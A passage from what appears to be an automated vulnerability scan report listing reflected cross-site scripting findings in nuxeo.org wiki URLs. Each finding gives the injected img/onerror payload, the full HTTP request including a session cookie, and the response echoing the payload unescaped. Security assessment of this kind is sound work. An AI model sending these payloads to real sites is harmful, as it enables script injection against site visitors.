Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:37 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13246
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite2b2fb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5aad0972571'>Howto launch the selenium test suite2b2fb<img src=a onerror=alert(1)>5aad0972571</a>
...[SNIP]...

4.497. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 601dd<img%20src%3da%20onerror%3dalert(1)>5ae4cf92fe7 was submitted in the REST URL parameter 4. This input was echoed as 601dd<img src=a onerror=alert(1)>5ae4cf92fe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main601dd<img%20src%3da%20onerror%3dalert(1)>5ae4cf92fe7/JCRMigration HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:31 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12936
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main601dd%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5ae4cf92fe7/">Main601dd<img src=a onerror=alert(1)>5ae4cf92fe7</a>
...[SNIP]...

4.498. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69a0c"><img%20src%3da%20onerror%3dalert(1)>c19e02784b was submitted in the REST URL parameter 4. This input was echoed as 69a0c"><img src=a onerror=alert(1)>c19e02784b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main69a0c"><img%20src%3da%20onerror%3dalert(1)>c19e02784b/JCRMigration HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:46 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12989
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main69a0c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec19e02784b/JCRMigration?format=xar&amp;name=Main69a0c"><img src=a onerror=alert(1)>c19e02784b.JCRMigration&amp;pages=Main69a0c">
...[SNIP]...

4.499. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dc44"><img%20src%3da%20onerror%3dalert(1)>62e95f58fe5 was submitted in the REST URL parameter 5. This input was echoed as 2dc44"><img src=a onerror=alert(1)>62e95f58fe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/JCRMigration2dc44"><img%20src%3da%20onerror%3dalert(1)>62e95f58fe5 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12986
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/JCRMigration2dc44%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E62e95f58fe5?format=xar&amp;name=Main.JCRMigration2dc44"><img src=a onerror=alert(1)>62e95f58fe5&amp;pages=Main.JCRMigration2dc44">
...[SNIP]...

4.500. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d9d25<img%20src%3da%20onerror%3dalert(1)>6e390cba6e2 was submitted in the REST URL parameter 5. This input was echoed as d9d25<img src=a onerror=alert(1)>6e390cba6e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/JCRMigrationd9d25<img%20src%3da%20onerror%3dalert(1)>6e390cba6e2 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigrationd9d25%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6e390cba6e2'>JCRMigrationd9d25<img src=a onerror=alert(1)>6e390cba6e2</a>
...[SNIP]...

4.501. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e829<img%20src%3da%20onerror%3dalert(1)>4dac70b73d4 was submitted in the REST URL parameter 4. This input was echoed as 1e829<img src=a onerror=alert(1)>4dac70b73d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main1e829<img%20src%3da%20onerror%3dalert(1)>4dac70b73d4/Nuxeo+Testing+Framework HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13083
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main1e829%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4dac70b73d4/">Main1e829<img src=a onerror=alert(1)>4dac70b73d4</a>
...[SNIP]...

4.502. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f7d4"><img%20src%3da%20onerror%3dalert(1)>d2d6af453d5 was submitted in the REST URL parameter 4. This input was echoed as 6f7d4"><img src=a onerror=alert(1)>d2d6af453d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6f7d4"><img%20src%3da%20onerror%3dalert(1)>d2d6af453d5/Nuxeo+Testing+Framework HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13149
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main6f7d4%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed2d6af453d5/Nuxeo+Testing+Framework?format=xar&amp;name=Main6f7d4"><img src=a onerror=alert(1)>d2d6af453d5.Nuxeo Testing Framework&amp;pages=Main6f7d4">
...[SNIP]...

4.503. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd33a<img%20src%3da%20onerror%3dalert(1)>04410ba00e3 was submitted in the REST URL parameter 5. This input was echoed as fd33a<img src=a onerror=alert(1)>04410ba00e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfd33a<img%20src%3da%20onerror%3dalert(1)>04410ba00e3 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13071
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfd33a%3Cimg+src%3Da+onerror%3Dalert%281%29%3E04410ba00e3'>Nuxeo Testing Frameworkfd33a<img src=a onerror=alert(1)>04410ba00e3</a>
...[SNIP]...

4.504. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe512"><img%20src%3da%20onerror%3dalert(1)>8ca69496434 was submitted in the REST URL parameter 5. This input was echoed as fe512"><img src=a onerror=alert(1)>8ca69496434 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfe512"><img%20src%3da%20onerror%3dalert(1)>8ca69496434 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:10 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13133
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Nuxeo+Testing+Frameworkfe512%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8ca69496434?format=xar&amp;name=Main.Nuxeo Testing Frameworkfe512"><img src=a onerror=alert(1)>8ca69496434&amp;pages=Main.Nuxeo Testing Frameworkfe512">
...[SNIP]...

4.505. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4eff"><img%20src%3da%20onerror%3dalert(1)>f1fa6463d0e was submitted in the REST URL parameter 4. This input was echoed as a4eff"><img src=a onerror=alert(1)>f1fa6463d0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maina4eff"><img%20src%3da%20onerror%3dalert(1)>f1fa6463d0e/NuxeoDevGettingStarted HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:46 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13132
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maina4eff%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1fa6463d0e/NuxeoDevGettingStarted?format=xar&amp;name=Maina4eff"><img src=a onerror=alert(1)>f1fa6463d0e.NuxeoDevGettingStarted&amp;pages=Maina4eff">
...[SNIP]...

4.506. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3d601<img%20src%3da%20onerror%3dalert(1)>573ef0b70f0 was submitted in the REST URL parameter 4. This input was echoed as 3d601<img src=a onerror=alert(1)>573ef0b70f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main3d601<img%20src%3da%20onerror%3dalert(1)>573ef0b70f0/NuxeoDevGettingStarted HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13066
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main3d601%3Cimg+src%3Da+onerror%3Dalert%281%29%3E573ef0b70f0/">Main3d601<img src=a onerror=alert(1)>573ef0b70f0</a>
...[SNIP]...

4.507. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b0a6"><img%20src%3da%20onerror%3dalert(1)>2f680be3ffe was submitted in the REST URL parameter 5. This input was echoed as 3b0a6"><img src=a onerror=alert(1)>2f680be3ffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoDevGettingStarted3b0a6"><img%20src%3da%20onerror%3dalert(1)>2f680be3ffe HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13116
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/NuxeoDevGettingStarted3b0a6%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E2f680be3ffe?format=xar&amp;name=Main.NuxeoDevGettingStarted3b0a6"><img src=a onerror=alert(1)>2f680be3ffe&amp;pages=Main.NuxeoDevGettingStarted3b0a6">
...[SNIP]...

4.508. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7c6d<img%20src%3da%20onerror%3dalert(1)>83bdae15118 was submitted in the REST URL parameter 5. This input was echoed as f7c6d<img src=a onerror=alert(1)>83bdae15118 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoDevGettingStartedf7c6d<img%20src%3da%20onerror%3dalert(1)>83bdae15118 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13054
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
